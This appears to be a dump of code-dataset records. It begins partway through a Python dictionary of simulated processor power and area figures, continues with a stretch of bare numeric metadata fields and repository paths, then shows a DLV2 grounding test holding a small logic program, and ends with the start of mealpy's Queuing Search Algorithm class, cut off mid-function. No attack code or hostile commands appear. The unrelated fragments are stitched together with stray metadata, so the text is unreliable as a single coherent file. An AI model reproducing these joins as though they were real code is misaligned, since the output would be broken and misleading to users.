'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000777399,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756812,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194409,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0520243,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.3092,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175885,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176698,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68831,
'Instruction Fetch Unit/Runtime Dynamic': 0.431617,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00569493,
'L2/Runtime Dynamic': 0.0018099,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49708,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.608061,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0407628,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0407627,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68957,
'Load Store Unit/Runtime Dynamic': 0.849851,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100514,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.201028,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356728,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0357325,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205754,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0289097,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.423142,
'Memory Management Unit/Runtime Dynamic': 0.0646422,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6095,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00787099,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0890453,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0969163,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.00431,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.171484,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.276597,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.139617,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.587698,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.196128,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.20665,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0071928,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0520131,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0531952,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0520131,
'Execution Unit/Register Files/Runtime Dynamic': 0.060388,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.109577,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.287067,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.54322,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00230096,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00230096,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00208598,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000852284,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000764153,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00745207,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0191372,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0511379,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.25281,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.173547,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.173687,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.62919,
'Instruction Fetch Unit/Runtime Dynamic': 0.424962,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00553716,
'L2/Runtime Dynamic': 0.00176953,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.47472,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.597268,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0400394,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0400393,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.6638,
'Load Store Unit/Runtime Dynamic': 0.834767,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0987304,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.19746,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0350397,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0350981,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.202248,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0285234,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.418549,
'Memory Management Unit/Runtime Dynamic': 0.0636215,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.5132,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00773688,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0875208,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0952577,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.9636,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.3897204590469652,
'Runtime Dynamic': 0.3897204590469652,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.0236227,
'Runtime Dynamic': 0.0134307,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.7343,
'Peak Power': 106.847,
'Runtime Dynamic': 14.7515,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.7107,
'Total Cores/Runtime Dynamic': 14.738,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.0236227,
'Total L3s/Runtime Dynamic': 0.0134307,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 74.995624
| 124
| 0.68179
| 8,082
| 68,546
| 5.77654
| 0.064835
| 0.12372
| 0.113096
| 0.093561
| 0.942338
| 0.934456
| 0.921047
| 0.89605
| 0.868397
| 0.849634
| 0
| 0.130919
| 0.224535
| 68,546
| 914
| 125
| 74.995624
| 0.74738
| 0
| 0
| 0.664114
| 0
| 0
| 0.658016
| 0.048142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78381d596a7cf174afef86fe3278172cf3cc1324
| 579
|
py
|
Python
|
tests/parser/grounding.backjump.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.backjump.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.backjump.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
%This is an example where we can not eliminate the duplicates of the rules.
%#maxint=8.
p(X) | r(X) :- q(X,Y), q(A,B), s(X,A), s(Y,B).
q(1,3).
q(2,4).
q(2,7).
q(3,8).
q(3,5).
q(1,6).
s(0,1).
s(1,2).
s(2,3).
s(3,4).
s(4,5).
s(5,6).
s(6,7).
s(7,8).
"""
output = """
%This is an example where we can not eliminate the duplicates of the rules.
%#maxint=8.
p(X) | r(X) :- q(X,Y), q(A,B), s(X,A), s(Y,B).
q(1,3).
q(2,4).
q(2,7).
q(3,8).
q(3,5).
q(1,6).
s(0,1).
s(1,2).
s(2,3).
s(3,4).
s(4,5).
s(5,6).
s(6,7).
s(7,8).
"""
| 12.319149
| 76
| 0.450777
| 150
| 579
| 1.74
| 0.22
| 0.030651
| 0.061303
| 0.114943
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0
| 0.130337
| 0.231434
| 579
| 46
| 77
| 12.586957
| 0.45618
| 0
| 0
| 0.947368
| 0
| 0.052632
| 0.942272
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7849208ac635f1befaae961bbbb424de916de039
| 13,414
|
py
|
Python
|
mealpy/human_based/QSA.py
|
ashishpatel26/mealpy
|
62160e61b8bd4b084e44b80fda720e6bd6332e03
|
[
"MIT"
] | 1
|
2021-05-20T06:53:08.000Z
|
2021-05-20T06:53:08.000Z
|
mealpy/human_based/QSA.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | null | null | null |
mealpy/human_based/QSA.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | 1
|
2020-09-30T21:14:33.000Z
|
2020-09-30T21:14:33.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 10:21, 18/03/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, choice, exponential, random
from numpy import power, abs, array, where
from copy import deepcopy
from mealpy.root import Root
class BaseQSA(Root):
"""
My version of: Queuing search algorithm (QSA)
(Queuing search algorithm: A novel metaheuristic algorithm for solving engineering optimization problems)
Notes:
+ Remove all third loop
+ Using g_best solution in business 3 instead of random solution
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose)
self.epoch = epoch
self.pop_size = pop_size
def _calculate_queue_length__(self, t1, t2, t3):
""" Calculate length of each queue based on t1, t2,t3
t1 = t1 * 1.0e+100
t2 = t2 * 1.0e+100
t3 = t3 * 1.0e+100
"""
if t1 > 1.0e-6:
n1 = (1 / t1) / ((1 / t1) + (1 / t2) + (1 / t3))
n2 = (1 / t2) / ((1 / t1) + (1 / t2) + (1 / t3))
else:
n1 = 1.0 / 3
n2 = 1.0 / 3
q1 = int(n1 * self.pop_size)
q2 = int(n2 * self.pop_size)
q3 = self.pop_size - q1 - q2
return q1, q2, q3
def _update_business_1__(self, pop=None, current_epoch=None):
A1, A2, A3 = pop[0][self.ID_POS], pop[1][self.ID_POS], pop[2][self.ID_POS]
t1, t2, t3 = pop[0][self.ID_FIT], pop[1][self.ID_FIT], pop[2][self.ID_FIT]
q1, q2, q3 = self._calculate_queue_length__(t1, t2, t3)
case = None
for i in range(self.pop_size):
if i < q1:
if i == 0:
case = 1
A = deepcopy(A1)
elif q1 <= i < q1 + q2:
if i == q1:
case = 1
A = deepcopy(A2)
else:
if i == q1 + q2:
case = 1
A = deepcopy(A3)
beta = power(current_epoch, power(current_epoch / self.epoch, 0.5))
alpha = uniform(-1, 1)
E = exponential(0.5, self.problem_size)
F1 = beta * alpha * (E * abs(A - pop[i][self.ID_POS])) + exponential(0.5) * (A - pop[i][self.ID_POS])
